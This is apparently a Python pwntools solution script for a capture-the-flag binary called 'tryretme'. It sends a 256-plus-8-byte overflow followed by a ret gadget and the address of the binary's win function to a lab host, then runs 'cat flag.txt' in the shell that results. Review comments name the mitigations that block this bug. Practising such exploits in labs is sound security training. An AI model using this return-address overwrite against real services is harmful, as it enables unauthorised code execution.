from pwn import *

# Proof-of-concept for the "tryretme" challenge binary: the input sent after the
# prompt overwrites the saved return address so that control lands in the
# binary's own `win` symbol.
# NOTE(review): `win` is taken straight from the ELF symbol table with no leak
# step, so this presumably relies on a non-PIE build without a stack canary.
# Confirm with checksec. Those mitigations and a bounded read are what stop
# this class of bug.

# Quiet logging; target is 64-bit Linux.
context.update(os="linux", arch="amd64", log_level="error")

# checksec=False only suppresses the mitigation summary pwntools would print.
binary = ELF("./tryretme", checksec=False)
context.binary = binary

# Challenge instance (address and port are specific to this lab session).
conn = remote("10.10.170.21", 9006)

# Locate a bare `ret` instruction inside the binary itself.
rop = ROP(binary)
ret_gadget = rop.find_gadget(["ret"])[0]
win_function_address = binary.symbols["win"]

# Layout: 256 filler bytes, 8 more bytes (presumably the buffer and the saved
# RBP slot; offsets are specific to this build), then the two return targets.
# The lone `ret` ahead of `win` is presumably there to keep the stack 16-byte
# aligned when `win` runs; verify against the binary.
payload = b"".join(
    [
        b"A" * 256,
        b"B" * 8,
        p64(ret_gadget),
        p64(win_function_address),
    ]
)

# Wait for the prompt before sending, so the payload is read by the vulnerable input call.
conn.recvuntil(b"Return to where? : \n")
conn.sendline(payload)

# After the banner the script sends a shell command, so `win` evidently hands
# over a shell; read back a single line of output.
conn.recvuntil(b"ok, let's go!\n\n")
conn.sendline(b"cat flag.txt")
print(conn.recvline().decode())

conn.close()